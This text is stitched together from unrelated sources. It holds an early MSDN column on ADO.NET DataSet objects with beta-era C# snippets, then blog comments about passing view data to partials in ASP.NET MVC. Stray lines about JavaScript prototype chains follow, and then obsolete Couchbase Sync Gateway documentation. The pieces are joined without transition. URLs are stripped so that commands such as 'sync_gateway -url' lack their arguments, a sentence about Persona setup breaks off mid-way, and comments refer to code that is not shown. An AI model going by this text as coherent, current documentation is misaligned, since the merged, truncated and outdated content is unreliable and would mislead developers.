In the last column, I covered data readers—a simple and efficient forward cursor to scroll a set of data rows. In this column, the spotlight is on DataSet objects—the .NET class that is the quintessence of disconnected and XML-driven data containers.
The most accurate description for a DataSet object is in the title of this column. It sounds even more precise if you preface it with an "in-memory" qualifier. So putting it all together, you should think of a DataSet object as an in-memory, database-like data container.
The DataSet can be filled out as the result of a query command run against an OLE DB or a Managed provider. Regardless of the different syntax and structure, at least in the simplest contexts you end up using the DataSet object in much the same way you would with ADO Recordsets. You create them, set some arguments, and then have both filled up with data, care of a special command (usually a SQL command). Next, you move your record pointer back and forth over the table of records and update or delete records.
So far nothing is really different from an ADO Recordset. And nothing really justifies such a "revolution" in the object model. Due to the lack of a Recordset object in ADO.NET, backward compatibility with existing ADO code is significantly broken. At the end of the day, however, it is precisely the absence of a Recordset object that pushes you to optimize the design and the performance of your data access components.
Let's start by reviewing the aspects in which ADO Recordset and DataSet objects are similar. Both can be disconnected, serialize themselves to XML, and can be fabricated manually using disconnected data. And both support data shaping, local sorting, filtering, and batch update.
Many design aspects make them significantly different as well. DataSets are data-centric, as opposed to the database-centric nature of recordsets. DataSets work only in memory and at no time in their existence have anything to do with databases or, in general, with data sources. DataSet objects are in-memory repositories of tables: as many tables as you need, not just one as is the case with recordsets.
In addition, a DataSet can serialize its content to XML but without the burden of necessarily creating a disk file. While in ADO, XML is a mere output format; in ADO.NET, instead, XML is the underlying representation of the object. The XML representation of the DataSet content is available all the time through a special set of properties and methods. In no way is the representation built at runtime through a spooky instance of the XML DOM object.
DataSets can use different schemas of data to create their XML output or to rebuild from a remote source. The hierarchical XML model and the relational Recordset schema happily cohabitate within the DataSet object context giving you an unprecedented power of navigation over a set of records.
And finally, a DataSet object is an instance of a .NET managed class, rather than an instance of a COM object—more often than not, an instance of a COM Automation object. This means that a DataSet object can be safely stored in an ASP .NET Session slot without concerns for the overall scalability of the application. In addition, the block of records it contains can be transmitted across a network irrespective of corporate firewalls along the way. This happens because .NET objects are thread-safe and do not require thread affinity, and because a DataSet is already a XML stream that travels quite comfortably over HTTP and port 80.
A DataSet object is a class that descends from Component and implements the IListSource interface. In Visual Basic .NET, the declaration looks like the following:
Public Class DataSet
Inherits Component
Implements IListSource
The IListSource interface, in turn, derives from IList and owes its content to some sort of data source to which the code connects. IListSource has a single method, called GetList, to expose such content. GetList returns an IList-based collection of items. IList is a descendant of the base ICollection interface and turns out to be the abstract base class of all .NET lists.
At the end of the day, a DataSet object is a collection of more specialized objects holding the data. On its own, the DataSet provides the ability to serialize according to given XML schemas, and an all-encompassing nature that is remarkably helpful when you need to keep several tables of interrelated data in a single place.
In addition, a DataSet is a completely in-memory object, with all the pro and con considerations that usually apply to this role. It is easy and quick to access as long as the amount of information stored is neither particularly volatile nor growing so fast as to require frequent refreshes.
A DataSet is a container that looks like a database. All the data you manipulate is kept in memory, yet it provides you with methods to index, sort, logically join, set constraints, and check data integrity. Only a few of these extended functionalities are implemented directly by the DataSet object, which reinforces the overall feeling of integration and consistency that pervades across the whole .NET Framework.
You create a DataSet object using the ordinary new keyword with a couple of possible constructors:
DataSet data = new DataSet();
DataSet data = new DataSet("MyDataSet");
As you can see, the difference is only in the name you want to assign to the newly created data container. You can omit the name, but if you supply one it must be non-empty. If you omit the name, and therefore use the former constructor, the name defaults to NewDataSet. However, the dataset's name doesn't play a vital role in the object's usage. The only place where you will ever see it used is in the root tag of the XML document that renders the content of the DataSet.
Let's review the geography of DataSets—namely the sub-objects and collections that form the actual programming model—and explore the various approaches you can take to populate a DataSet object.
The DataSet class comprises three main collections:
Tables gathers all the child tables of data that you should be getting from their external sources and explicitly adds them to the repository. Tables are rendered through the DataTable object. Once part of the DataSet family, a table becomes automatically serializable through the DataSet's XML schema. Any table in a DataSet is characterized by a unique name, but can also be accessed through index.
A relation is a logical SQL JOIN statement that creates a relationship between two tables previously added to the DataSet. The relation links the two tables on the matching values in a common column in much the same way a JOIN statement does.
The big difference between a DataSet relation and JOIN statements is that the two tables involved in the link remain distinct and no unified table, no matter physical or logical, is created. A relation can be seen as an extra column added to rows on the primary table whose content is an array of matching rows on the target table.
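As a concrete sketch of that navigation model, using the class names from the released ADO.NET (DataRelation, GetChildRows); the beta builds this column describes may name things differently:

```csharp
using System;
using System.Data;

var ds = new DataSet("Shop");

var customers = new DataTable("Customers");
customers.Columns.Add("ID", typeof(int));
customers.Columns.Add("Name", typeof(string));
customers.Rows.Add(1, "Alice");

var orders = new DataTable("Orders");
orders.Columns.Add("OrderID", typeof(int));
orders.Columns.Add("CustomerID", typeof(int));
orders.Rows.Add(100, 1);
orders.Rows.Add(101, 1);

ds.Tables.Add(customers);
ds.Tables.Add(orders);

// The relation links the matching column values, but both tables
// remain distinct; no unified table is created.
var rel = new DataRelation("CustomerOrders",
    customers.Columns["ID"], orders.Columns["CustomerID"]);
ds.Relations.Add(rel);

// Navigate from a parent row to its matching child rows.
DataRow[] childRows = customers.Rows[0].GetChildRows(rel);
Console.WriteLine(childRows.Length); // 2
```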
ExtendedProperties gets the collection of custom user information whose structure and logic is completely up to you. You use this property in the same way you would use ASP Session or Application collections.
data.ExtendedProperties.Add("refreshat", "12:00");
Among the other properties of the DataSet object, the DefaultView property deserves a special mention. It returns a DataSetView object that represents a custom, filtered view over all the tables currently forming the dataset. This feature allows you to build multiple different views of the dataset content; for example, views showing different fields for different users.
To set a dataset's view, you first create and populate the DataSet. Next, you create a new instance of the DataSetView object passing the DataSet reference to the class constructor.
DataSet data = new DataSet();
// fill the data set here
DataSetView dsv = new DataSetView(data);
So far, you have created an association between two objects but you haven't provided the information needed to create a collection of table-specific views. You do this through a new type of object—the TableMapping object.
A table mapping is meant to define the custom settings used to view a table in a DataSetView view. Basically, it applies a sort of mask on top of any table in the DataSet. This mask can provide automatic filtering, sorting, as well as an alternative naming for fields. By simply assigning a DataSetView object to the DefaultView property of a DataSet, you enable a different view of the same content.
Another couple of important elements in the DataSet's geography are the Xml and XmlData properties. They let you read or change the DataSet structure and content using XML. The Xml property exposes both schema and data. The XmlData property makes available, for reading and writing, only data.
The DataSet is a publicly creatable object, as are almost all the other ADO.NET objects. Normally, you create a DataSet with or without a custom name. However, DataSetName is the property you can use to get and set the DataSet's name. Next, you might want to set some environment attributes such as CaseSensitive and EnforceConstraints.
The former determines whether string comparisons within child DataTable objects have to be case-sensitive. By default, the property returns False.
EnforceConstraints is a Boolean value that indicates whether any constraint rule set through the DataTable's Constraints collection has to be verified when attempting an update operation. Constraints are a collection of Constraint objects, each of which defines a rule enforced by the table to maintain data integrity.
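A short sketch of such a rule in action, again with released ADO.NET names (UniqueConstraint, ConstraintException), which may differ in the beta:

```csharp
using System;
using System.Data;

var dt = new DataTable("People");
dt.Columns.Add("ID", typeof(int));

// A rule the table enforces to maintain data integrity.
dt.Constraints.Add(new UniqueConstraint(dt.Columns["ID"]));

var ds = new DataSet();
ds.Tables.Add(dt);
ds.EnforceConstraints = true; // the default, shown for clarity

dt.Rows.Add(1);
bool violated = false;
try
{
    dt.Rows.Add(1); // duplicate key
}
catch (ConstraintException)
{
    violated = true;
}

Console.WriteLine(violated); // True
```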
On the XML side of a DataSet, you can decide to set the namespace name (the Namespace property) and the namespace's prefix (the Prefix property) to be used when serializing to XML the content of the object.
Upon creation, a DataSet is empty as its Tables collection has no element. You can add tables to the collection in two basic ways—through a .NET data adapter or by manually creating a DataTable object and adding it to the collection.
A data adapter takes the form of a SQLDatasetCommand or a ADODatasetCommand object. (Notice that the names of these classes are subject to change with the Beta 2 of .NET.)
A data adapter exposes methods that hide what really happens under the covers and is not at all different from what you can do manually. The DataTable object is first created as follows:
DataTable dt = new DataTable();
Next, it is given a schema in terms of columns and related attributes, and finally it gets filled up with rows. You use the DataTable's Rows collection for this and append one DataRow object after the other. When the table is ready, it is inserted in the Tables collection.
A data adapter executes this procedure under the control of the FillDataSet method.
SQLDatasetCommand cmd = new SQLDatasetCommand(strCmd, strConn);
DataSet data = new DataSet();
cmd.FillDataSet(data, strTableName);
Such a method serves the purpose of updating data and schema of the specified table in the given DataSet. FillDataSet retrieves the data from the data source using the query command you passed through the adapter's class constructor.
There must be a connection object associated with the command, right? It can be specified either through a SQLConnection object (an ADOConnection object if you're targeting an OLE DB data source) or a simpler connection string. Either way, if the connection is closed when needed, it is opened to retrieve data and then closed again. If the connection is open before FillDataSet is invoked, it is used and left open.
FillDataSet has an extra calling prototype that lets you load only a portion of all the selectable records at a time. You specify the 0-based position of the record to start loading with and the maximum number of records to retrieve for each step. This trick allows you to implement an asynchronous reading of records from virtually any data source.
Furthermore, bear in mind that if the command returns multiple results, FillDataSet will only take into account the first result—or the specified portion of it, if you elected to read a maximum number of records at a time. By contrast, if the command returns no rows, then no table is added to the DataSet.
Note that any error occurring while populating the data set won't roll back the changes already submitted: any row added or modified prior to the error is acquired and never canceled. When your aim is to refresh a dataset, as opposed to filling it up, you can avoid duplicated rows if you use the same SQL statement that initially populated the DataSet and primary key information is present.
Primary key information is normally inferred by the table metadata if you're fetching records out of a relational database. Otherwise, it might be set through the PrimaryKey property of the DataTable object.
DataColumn[] keys = new DataColumn[1];
DataTable dt = new DataTable("MyList");
keys[0] = dt.Columns["ID"];
dt.PrimaryKey = keys;
The DataSet object has the built-in ability to recover some viable missing information. The MissingSchemaAction property, for example, indicates how to manage potentially inconsistent situations where missing tables or columns may cause unpredictable behaviors. By assigning a predefined value to MissingSchemaAction, you decide whether the missing information must be simply added to the DataSet's schema or raise a warning or an error. If you set the property to AddWithKey as follows:
data.MissingSchemaAction = MissingSchemaAction.AddWithKey
Then all the necessary columns and key information is added to complete the schema.
Data adapters are specialized objects that end up creating and filling data tables. You can run the same procedure under your own control and populate a data set with non-database records. For example, the following snippet shows how to add a table with directory information:
DataTable dt = new DataTable();
DataColumn colName = new DataColumn();
colName.DataType = System.Type.GetType("System.String");
colName.ColumnName = "FolderName";
dt.Columns.Add(colName);
DataColumn colDesc = new DataColumn();
colDesc.DataType = System.Type.GetType("System.String");
colDesc.ColumnName = "FolderDesc";
dt.Columns.Add(colDesc);
Directory dir = new Directory(strDir);
foreach (Directory d in dir.GetDirectories())
{
DataRow dr = dt.NewRow();
dr["FolderName"] = d.Name;
dr["FolderDesc"] = "Content of " + d.Name;
dt.Rows.Add(dr);
}
DataSet data = new DataSet();
data.Tables.Add(dt);
All the tables linked to a DataSet object can be manipulated through the same API regardless of their actual origin. Whether you created a table from SQL Server or from scanning the content of a folder makes no difference whatsoever when it comes to putting tables into relation or indexing or persisting to XML.
All the data is kept in memory and can be updated, sorted, and filtered without resorting to any server-side functionality. All database-like functionalities are implemented as in-memory features including a commit model that closely resembles the transaction model of many DBMS. You really only need to get back to the server when you want to save changes to the data source. This will raise another category of problems that I'll tackle in an upcoming column.
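That commit model can be sketched as follows with the released API (AcceptChanges, RejectChanges, RowState; beta names may differ): edits accumulate in memory until you commit or roll them back, entirely without a database.

```csharp
using System;
using System.Data;

var dt = new DataTable("T");
dt.Columns.Add("Name", typeof(string));
dt.Rows.Add("original");
dt.AcceptChanges(); // commit: this becomes the baseline version

dt.Rows[0]["Name"] = "edited";
Console.WriteLine(dt.Rows[0].RowState); // Modified

dt.RejectChanges(); // roll back to the baseline, like a transaction abort
Console.WriteLine(dt.Rows[0]["Name"]); // original
```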
I feel that one day I could love ADO.NET and ASP .NET, but this day is yet to come. Actually, I don't feel comfortable enough with them to take the plunge to recommend it for the next project. Ideally, I would wait at least one year to start and more or less two years to go live. Production boxes are very fierce beasts. Am I missing something?
We're really close now to the Beta 2 of .NET. Many companies involved in pilot projects are already "playing" with it as I write this response. Having it publicly available is a matter of weeks. Once you have put your hands on it, have a careful look at the documentation. The more you feel comfortable with that, the more I recommend that you take the plunge.
When you write code, system documentation is your best friend. This is even truer if you consider that you will be working with a new and somehow unexplored platform. To take the project home, you must survive by relying on your team skills and the documentation available.
By the time the first .NET platform ships, we will certainly have excellent documentation. Already having good documentation for Beta 2 is a significant signal that we're headed in the right direction.
Personally, I'd first check documentation for ASP .NET server controls, in particular, the custom controls. Then, I'd make sure that the ADO.NET documentation for related objects (and for overrides of the same methods) is not the offspring of a more or less smart cut-and-paste. Finally, I'd make sure that I feel confident in my ability to deploy ASP .NET applications.
Loving .NET might not be enough to start a real-world project, but feeling comfortable with the SDK and documentation is a great place to start. It's exactly what you need to start a new "production" story.
Source: http://msdn.microsoft.com/en-us/library/ms810289.aspx
Partial.
I don’t know any non MVC violating solution either, but why didn’t you consider using HtmlHelper.RenderAction?
<% Html.RenderAction(c => c.Action()); %>
If you know that the data is going to be needed in every single page why not use the old standby of getting the data from the global.asax and placing it in the context items collection, then create yourself a viewdata base model with a property that retrieves that data from the items collection. Add that base to the generic on the master page and inherit all other view data models from that base? Then you have the data available at every request. Just a thought.
@Paco — RenderAction() was moved into the Microsoft.Web.MVC namespace after the last release (that means that it will most likely be in futures and not the core MVC framework).
You have illustrated the need for subcontrollers. HomeController should use a subcontroller for the partials. Each action can use a different subcontroller specific to the needs of the action.
You don’t want an inheritance hierarchy to attempt to solve a composition problem.
It’s unfortunate that the MVC team is spending so much time on trivial crap like AJAX helpers instead of working on a good solution for this very common problem.
I would definitely have included RenderAction, even though it is in the ‘Futures’ at the moment, especially if including a detailed instruction and code sample of how to do it in code-behind. There’s no ‘good’ way to do this at all right now, but RenderAction is a pretty decent ‘not-good’ way to do it. The abstract base class method is a mess and could grow out of control as your application gets more complex.
That is a bit of work for something that should be simple. I agree subcontrollers would be a solution the best solution, and would still be testable.
RenderAction is the best possible way to do this. It helps keep the design and code much simpler and more modular. I strongly feel that no other way is as elegant as RenderAction.
I think the problem some people have with RenderAction is that it’s not sufficiently “MVC” because you have the view calling back to a controller. While I’d agree that isn’t strictly MVC, I don’t think you’re going to get much better.
Besides, it’s kind of the same way of thinking that you’d use with an AJAX app. In an AJAX app, you’d have client-side code firing up a controller action and then stuffing the result in a DIV or getting a JSON result and programmatically changing the UI. Bottom line is that in this case you also have UI code calling back to a controller. Granted, it’s generally in response to a user action, but it’s still UI code using a controller…
“You don’t want an inheritance hierarchy to attempt to solve a composition problem.” – Jeffrey Palermo
Exactly!
“I think the problem some people have with RenderAction is that it’s not sufficiently “MVC” because you have the view calling back to a controller. While I’d agree that isn’t strictly MVC, I don’t think you’re going to get much better.” – Jamie
I get that feeling too. If we would have to add an extra “page composition layer” to the mix, I’m afraid the simplicity/beauty of the MVC framework would soon be lost.
I would solve this problem using interceptors attached to my controller methods by an IoC container.
That is similar to using the ActionFilter, but the interceptors are less intrusive imo.
I love the way you go through different options to find a solution. It teaches me a lot about the ways you can do stuff in MVC. But I agree with Jeffrey that this problem is mostly a composition problem. Inheritance implements an "is-a" relation, and I think your HomeControllerPopular is-not-a HomeControllerFeatured. Also, inheritance very tightly couples classes and makes your solution less flexible.
I think you should really have the ApplicationController and a HomeController that inherits from that. But then the HomeController should delegate some of its work to composites like the FeaturedController. Makes sense?
@Jeffrey, @Richard – You are absolutely right about the central issue being compositionality and inheritance being a bad approach to solving it.
I still have mixed feelings about the subcontroller approach. You take a trip from Seattle to Paris and then you phone home to have each of your bags sent to you? It seems like a better idea (less fuel, more scalable) to bring all of your luggage on the initial plane ride.
Also, the subcontroller approach couples the design of your view to the design of your controllers. Creating a new user control requires you to create a new controller action. It would be nice if your page design could be completely independent from the architecture of your application.
Great post! I really like the first solution and that’s the one I’ve been using. Since the problem relates to testability, it is always tackled by a little mangling in the tests. In this case it would suffice to mock ActionExecutingContext and explicitly call the OnActionExecuting method. That’s how I started out until I found PostSharp (an AOP framework for .NET, in case you’re not aware): Partial becomes an aspect of the action. It even fits better conceptually, since there’s no actual filtering involved when using ActionFilterAttribute, but injection.
Hi, thank you for your tips, they're very useful, and this post in particular.
My problem is simple: I don't want the user control everywhere, only in a sub-category of my site.
I’ve tried to integrate th In/Out site from Codeplex () but it uses the Preview 3 of MVC.
At this prehistoic time they used a ComponentController (UpdateComponentController) for user control and put in the view
that seems very simple. why do you remove this in Preview 4? Or in other words why should I do 4 or more derived class to do this ?
@Ernest – RenderAction() replaces RenderComponent() and RenderAction() will be in the futures download. So you can use RenderAction() with the warning that it is not supported by Microsoft.
The comments that I received on this post convinced me that using an action filter (method #3) is the right way to deal with the scenario that you describe. You can create an action filter that injects the view data that you need for your user control. Then decorate each controller action that returns a view containing the user control with that action filter.
Hope this helps!
@LarryB – I think we’re at the same wave length, I’ve been taking this exact approach ever since I started on mvc.net, it’s easy to write and read, and, hmmm, well, I just like it better than all other solutions I’ve seen so far.
Your final solution is begging to replaced with a set of decorators. Could you substitute a decorator pattern wired up in your IControllerFactory instead of the static class inheritance?
CALL TO ACTION: Master pages need some love
Please go to the above and leave a comment if you think master pages need some love…
I think there is a misunderstanding about how the RenderAction method works. It does not call back to the controller, thereby coupling the view and the controller. Doing so would require the controller action to have detailed knowledge of the page data requirements for all parts of the display. The controller and its actions would need to handle processing for concerns that are not part of the controller’s primary functionality. This would be a bad thing, IMHO, because the controller would require changes when the view content is changed, but not the primary data. This would happen if you use attributes or hard-code it in the controller method.
What RenderAction does is cause the entire MVC lifecycle to be executed for the controller/action specified and returns the rendered content for display. The view for the subview is just another view (aspx or ascx) and the controller can be specified. Thus all the work for the subview can be handled by another, more appropriate controller.
For example, in an ecommerce site, the Shopping Cart Summary user control could be handled by the ShoppingCartController, independent of the ShoppingController which would handle the shopping experience.
The next steps would be how to do this with AJAX and how to trigger subview updates (preferably as a result of model changes).
Would any of these options work for passing data between controllers? I have an account controller that is responsible for authentication. Once a user is authenticated, I want to call the member controller view and pass in the user data. Is this possible, or am I missing something?
thanks
Stephen, great stuff; it has definitely helped me a lot to learn MVC in immense detail. Do you have a code download for all of your samples? For example, this tip 31 doesn’t have a download associated with it, or was it left out on purpose?
While your solution works, it’s still more work than I think it should be. Why not have the ability to concatenate views? That way, one could have individual views for the header, content, and footer.
Stephen, can you please provide a sample project to download? I want to see the implementation. I am not able to implement this tip. It would be very nice if you posted a live example here.
Good solution …
Just one bigggg problem …
In the control constructor the HttpContext, Request, etc are null.
Is there any solution other than creating an action filter in ApplicationController?
I’m not doing so well in IT, but your post is really great. Good work, Stephen.
thx, very helpful 🙂
Good work!
OK, so I’m new to both ASP.NET and MVC, but where do the ‘Solution4.Partials’ and ‘Solution4.Models’ classes come from?
And how do you get to access the members of the ‘Master’ class, like ‘Master.AddViewData’ in the ‘ApplicationController’?
I tried to mock a call to a LINQ to SQL query, but I am struggling.
These are the properties that you would expect for the f function’s Variable object. The first item represents the parameters passed to the f() function. The remaining items correspond to each of the f() function’s local variables.
P.S. – Thanks for pointing out the gotcha on longer prototype chains. I thought I *could* walk the prototype chain via repeated constructor.prototype calls under normal circumstances.
I believe it is promising (currently version 4.0), so I would stick with it. Thanks.
Seems to me the second solution is the simplest solution that cleanly separates the concerns. The other solutions are ego massage. The argument that the second solution is inadequate because the filters are not executed when an action method is called from a test case is irrelevant. A test that ensures the method is decorated with the proper action filters is all that is needed.
Instead of having a hierarchy of controllers, why not have a hierarchy of viewdata classes? Have strongly typed views with an abstract viewdata base class. I’ve grown fond of creating custom viewdata classes instead of the dictionary method. Just a thought.
Obsolete documentation
For the latest Couchbase Mobile documentation, visit the Couchbase Mobile developer portal.
Couchbase Sync Gateway is an add-on that enables Couchbase Server 2.0 and later to act as a replication endpoint for Couchbase Lite. Sync Gateway runs an HTTP listener process that provides a passive replication endpoint and uses a Couchbase Server bucket as persistent storage for all database documents.
Sync Gateway provides an HTTP front-end for Couchbase Server that syncs with Couchbase Lite. The following figure shows how Sync Gateway interacts with mobile apps and Couchbase Server.
You can run Sync Gateway on the following operating systems:
Mac OS X 10.6 or later with a 64-bit CPU
Red Hat Linux
Ubuntu Linux
You can download Sync Gateway for your platform from.
The download contains an executable file called sync_gateway that you run as a command-line tool. For convenience, you can move it to a directory that is included in your $PATH environment variable.
You can connect Sync Gateway to Couchbase Server 2.0 or later.
To connect Sync Gateway to Couchbase Server:
Create a bucket named sync_gateway in the default pool.
You can use any name you want for your bucket, but sync_gateway is the default name that Sync Gateway uses if you do not specify a bucket name when you start Sync Gateway. If you use a different name for your bucket, you need to specify the -bucket option when you start Sync Gateway.
You start Sync Gateway by running sync_gateway with the -url option. The argument for the -url option is the HTTP URL of the Couchbase server to which you want Sync Gateway to connect. If you do not include any additional command-line options, the default values are used.
The following command starts Sync Gateway on port 4984, connects to the default bucket named sync_gateway in the Couchbase Server running on localhost, and starts the admin server on port 4985.
$ ./sync_gateway -url
If you used a different name for the Couchbase Server bucket or want to listen on a different port, you need to include those parameters as command-line options. For information about the available command-line options, see Administering Sync Gateway.
You can stop Sync Gateway by typing Control-C. There is no specific shutdown procedure and it is safe to stop it at any time.
This section describes how to administer Sync Gateway.
You can launch sync_gateway with command-line options. However, in the long run, it’s better to use JSON configuration files, which are the only way to serve multiple databases. You can also combine command-line options with configuration files.
The format of the sync_gateway command is:
sync_gateway [Options] [ConfigurationFile...]
Options
The command-line tool uses the regular Go flag parser, so you can prefix options with one or two hyphen (-) characters and give option values either as a following argument or in the same argument after an equal sign (=). The following command connects to an in-memory Walrus bucket named db and enables pretty-printed JSON responses:
$ sync_gateway -url=walrus: -bucket=db -pretty
The following command uses a Walrus database that is persisted to a file named /tmp/walrus/db.walrus.
$ sync_gateway -url=walrus:///tmp/walrus -bucket=db -pretty
Instead of entering the settings on the command-line, you can store them in a JSON file and then just provide the path to that file as a command-line argument. As a bonus, the file lets you run multiple databases.
If you want to run multiple databases, you can either add more entries to the databases property in the configuration file, or you can define each database in its own configuration file and list each of the configuration files on the command line.
Configuration files have one syntactic feature that’s not standard JSON: any text between backticks (`) is treated as a string, even if it spans multiple lines or contains double-quotes. This makes it easy to embed JavaScript code , such as the sync function.
The following sample configuration file starts a server with the default settings:
{ "interface":":4984", "adminInterface":":4985", "log":["REST"], "databases":{ "sync_gateway":{ "server":"", "bucket":"sync_gateway", "sync":`function(doc) {channel(doc.channels);}` } } }
You can see an example of a more complex configuration file in the CouchChat-iOS sample app.
The following command starts Sync Gateway with the parameters specified in a configuration file named config.json:
$ sync_gateway config.json
The following command starts Sync Gateway with the parameters specified in a configuration file named config.json and adds additional logging by including the -log option on the command line:
$ sync_gateway -log=HTTP+,CRUD config.json
Sync Gateway provides the following REST APIs:
The Sync REST API is used for client replication. The default port for the Sync REST API is 4984.
The Admin REST API is used to administer user accounts and databases. The default port for the Admin REST API is 4985.
The APIs are accessed on different TCP ports, which makes it easy to expose the Sync REST API on port 4984 to clients while keeping the Admin REST API on port 4985 secure behind your firewall.
If you want to change the ports, you can do that in the configuration file.
To change the Sync REST API port, set the interface property in the configuration file.
To change the Admin REST API port, set the adminInterface property.
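For illustration, a minimal configuration that moves both APIs to non-default ports might look like the following (the port numbers are arbitrary, and the walrus: server is the in-memory backend used in the earlier examples):

```json
{
  "interface": ":14984",
  "adminInterface": ":14985",
  "databases": {
    "sync_gateway": {
      "server": "walrus:",
      "bucket": "sync_gateway"
    }
  }
}
```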
Sync Gateway does not allow anonymous or guest access by default. A new server is accessible through the Sync REST API only after you enable guest access or create some user accounts. You can do this either by editing the configuration file before starting the server or by using the Admin REST API. For more information, see Anonymous Access.
You can authorize users and control their access to your database by creating user accounts and assigning roles to users.
You manage accounts by using the Admin REST API. This interface is privileged and for administrator use only.
A special user account named GUEST applies to unauthenticated requests. Any request to the Sync REST API that does not have an Authorization header or a session cookie is treated as coming from the GUEST account. This account and all anonymous access is disabled by default.
To enable the GUEST account, set its disabled property to false. You might also want to give it access to some channels. If you don’t assign some channels to the GUEST account, anonymous requests won’t be able to access any documents. The following sample command enables the GUEST account and allows it access to a channel named public:
$ curl -X PUT localhost:4985/$DB/_user/GUEST --data \ '{"disabled":false, "admin_channels":["public"]}'
You can authenticate users by using the methods described in the following sections.
Sync Gateway allows clients to authenticate by using either HTTP Basic Auth or cookie-based sessions. The session URL is /dbname/_session.
Sync Gateway supports Mozilla Persona, a sign-in system for the web that allows clients to authenticate by using an email address. You can enable Persona either by modifying your server configuration file or by starting Sync Gateway with an additional command-line option.
To enable Persona by modifying the configuration file, add a top-level persona property to the config.json file. The value of the persona property is an object with an origin property that contains your server’s canonical root URL as seen by clients. For example:
"persona" : { "origin" : "", "register" : true }
To enable Persona when you start Sync Gateway, add the -personaOrigin option to the command line and specify the server’s canonical root URL. For example:
$ sync_gateway -personaOrigin
The origin URL must be specified explicitly because the Persona protocol requires both client and server to agree on the server’s identity, and there’s no reliable way to derive the URL on the server, especially if it’s behind a proxy.
After that’s set up, you need to set the
Clients log in by sending a POST request to /dbname/_persona. The request body is a JSON document that contains an assertion property whose value is the signed assertion received from the identity provider. Just as with a _session login, the response sets a session cookie.
If the register property of the Facebook or Persona configuration is true, then clients can implicitly register new user accounts by authenticating through Facebook or Persona.
An app server can create a session for a user by sending a POST request to /dbname/_session. This works only on the admin port.
The request body is a JSON document with the following properties:
name: User name
ttl: Number of seconds until the session expires. This is an optional parameter. If ttl is not provided, the default value of 24 hours is used.
The response body is a JSON document that contains the following properties:
session_id: Session string
cookie_name: Name of the cookie the client should send
expires : Date and time that the session expires
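The request body described above can be sketched with a small helper. This is an illustrative function, not part of any Sync Gateway client library; the 24-hour fallback mirrors the documented default when ttl is omitted:

```javascript
// Hypothetical helper: build the JSON body for POST /dbname/_session.
function buildSessionRequest(name, ttlSeconds) {
  const body = { name: name };
  // ttl is optional; the gateway defaults to 24 hours (86400 seconds).
  body.ttl = (typeof ttlSeconds === "number") ? ttlSeconds : 24 * 60 * 60;
  return JSON.stringify(body);
}

console.log(buildSessionRequest("pupshaw"));       // {"name":"pupshaw","ttl":86400}
console.log(buildSessionRequest("pupshaw", 600));  // {"name":"pupshaw","ttl":600}
```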
This allows the app server to optionally do its own authentication using the following control flow:
Client sends credentials to your app server.
App server authenticates the credentials however it wants (LDAP, OAuth, and so on).
App server sends a POST request with the user name to the Sync Gateway Admin REST API server
/dbname/_session endpoint.
If the request fails with a 404 status, there is no Sync Gateway user account with that name. The app server can then create one (also using the Admin REST API) and repeat the
_session request.
The app server adds a Set-Cookie: HTTP header to its response to the client, using the session cookie name and value received from the gateway.
Subsequent client requests to the gateway will now include the session in a cookie, which the gateway will recognize. For the cookie to be recognized, your site must be configured so that your app’s API and the gateway appear on the same public host name and port.
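The cookie hand-off step above can be sketched as follows. The function and the sample field values (cookie name, session ID, expiry) are illustrative; only the three response properties come from the documented _session response:

```javascript
// Hypothetical sketch: turn the gateway's _session response into the
// Set-Cookie header value the app server returns to the client.
function sessionCookieHeader(sessionResponse) {
  // sessionResponse is the parsed JSON body from POST /dbname/_session:
  // { session_id: "...", cookie_name: "...", expires: "..." }
  return sessionResponse.cookie_name + "=" + sessionResponse.session_id +
         "; Expires=" + sessionResponse.expires + "; Path=/";
}

const header = sessionCookieHeader({
  session_id: "c5af80a039db4ed9d2b6865576b6d91fc260d8aa",
  cookie_name: "SyncGatewaySession",
  expires: "2014-06-01T12:00:00Z"
});
console.log(header);
```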
By default, a session created on Sync Gateway lasts 24 hours. If you create sessions by sending a POST request to /db/_session, you can set a custom value that overrides the system default. However, if you are using Persona for authentication, the only way to customize the session length is by modifying the kDefaultSessionTTL constant in the rest_session.go file.
This section contains information and concepts you need to know when developing apps that interact with Sync Gateway.
A replication from Sync Gateway specifies a set of channels to replicate. Documents that do not belong to any of the specified channels are ignored (even if the user has access to them).
You do not need to register or preassign channels. Channels come into existence as documents are assigned to them. Channels with no documents assigned to them are empty.
Valid channel names consist of text letters [A–Z, a–z], digits [0–9], and a few special characters [-+=/_.@]. The empty string is not allowed. The special channel name * denotes all channels. Channel names are compared literally—the comparison is case- and diacritic-sensitive.
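The naming rules above can be expressed as a simple check. This is a sketch based only on the character set stated in this document (ASCII letters, digits, and -+=/_.@), not an official validator:

```javascript
// Sketch of the documented channel-name rules: the empty string is invalid,
// and "*" is the special "all channels" name.
function isValidChannelName(name) {
  if (name === "*") return true;  // special name denoting all channels
  return /^[A-Za-z0-9\-+=\/_.@]+$/.test(name);
}

console.log(isValidChannelName("public"));     // true
console.log(isValidChannelName("chat-42"));    // true
console.log(isValidChannelName(""));           // false
console.log(isValidChannelName("no spaces"));  // false
```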
You assign documents to channels either by adding a channels property to the document or by using a sync function. No matter which option you choose, the channel assignment is implicit—the content of the document determines what channels it belongs to.
If a client doesn’t specify any channels to replicate, it gets all the channels to which its user account has access. Due to this behavior, most apps do not have to specify a channels filter—instead they can just do the default sync configuration on the client (that is, specify the Sync Gateway database URL with no filter).
A document can be removed from a channel without being deleted. For example, this can happen when a new revision is not added to one or more channels that the previous revision was in. Subscribers (downstream databases pulling from this database) should know about this change, but it’s not exactly the same as a deletion.
Sync Gateway’s _changes feed includes one more revision of a document after it stops matching a channel. It adds a removed property to the entry where this happens. (No client yet recognizes this property, though.) The value of the removed property is an array of strings where each string names a channel in which this revision no longer appears. Also, the body of the document appears to be empty to the client.
The effect on the client is that after a replication it sees the next revision of the document (the one that causes it to no longer match the channel). It won’t get any further revisions until the next one that makes the document match again.
This algorithm ensures that any views running in the client do not include an obsolete revision. The app code should use views to filter the results rather than just assuming that all documents in its local database are relevant.
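A client-side sketch of reading the removed property might look like this. The shape of the feed entry is illustrative (field values are made up), and the helper is hypothetical—as noted above, no client currently recognizes this property:

```javascript
// Sketch: detect channel removals in a _changes feed entry. The "removed"
// property, when present, lists channels this revision no longer appears in.
function removedChannels(changeEntry) {
  return changeEntry.removed || [];
}

const entry = {
  seq: 102,
  id: "doc123",
  removed: ["public"],          // revision left the "public" channel
  changes: [{ rev: "2-b0c4" }]
};
console.log(removedChannels(entry));                // [ 'public' ]
console.log(removedChannels({ seq: 103, id: "doc456" }));  // []
```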
If a user’s access to a channel is revoked or a client stops syncing with a channel, documents that have already been synced are not removed from the user’s device.
